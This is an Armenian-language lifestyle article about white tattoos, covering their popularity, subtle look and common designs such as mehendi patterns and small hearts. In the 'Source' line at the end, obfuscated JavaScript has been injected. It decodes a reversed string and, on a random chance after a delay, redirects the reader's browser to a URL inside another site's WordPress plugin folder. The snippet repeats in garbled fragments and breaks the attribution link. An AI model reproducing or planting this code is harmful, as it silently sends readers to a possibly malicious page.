Սպիտակ դաջվածքների տարբերակներ, որոնք միանշանակ ձեզ դուր կգան

Եթե սև կամ գունավոր դաջվածքները ձեզ թվում են անհետաքրքիր կամ շատ համարձակ, ապա առաջարկում ենք դիտարկել սպիտակ դաջվածքների տարբերակը։ Ձեզ ենք ներկայացնում սպիտակ դաջվածքների մի քանի տարբերակ։

Սպիտակ դաջվածքներն այս պահին շատ նորաձև են։ Հազարավոր մարդիկ արդեն ընտրել են այս տարբերակը և գրավել շատերի ուշադրությունը։ Այս տեսակի դաջվածքը հարմար կլինի այն մարդկանց համար, ովքեր համարձակություն չունեն առաջին անգամ սև դաջվածք անել։ Ցերեկային լույսի ներքո սպիտակ դաջվածքը չի երևում, և ցանկության դեպքում այն կարելի է թաքցնել տոնային քսուքով։

Սպիտակ դաջվածքները որևէ կերպ չեն զիջում իրենց գեղեցկությամբ, այլ ավելին՝ ավելի ինքնատիպ տեսք ունեն։ Շատերը նույնիսկ համադրում են սպիտակ դաջվածքները գունավոր և սև երանգների հետ։

Ամենատարածված սպիտակ դաջվածքներից են մեհենդի նախշերով դաջվածքները։ Նաև շատ տարածված են փոքր ադամանդի, սրտի կամ գրվածքի տեսքով դաջվածքները։

Կարելի է այսպիսի դաջվածքով զարդարել մարմնի ցանկացած հատված։ Սպիտակ դաջվածքների հերթական առավելություններից է նաև այն, որ դրանք գեղեցիկ են մաշկի բոլոր երանգների հետ։

Աղբյուր՝ $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torye-vam-toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tochno-ponravyatsya” target=”_blank” rel=”noopener”>Glamour.ru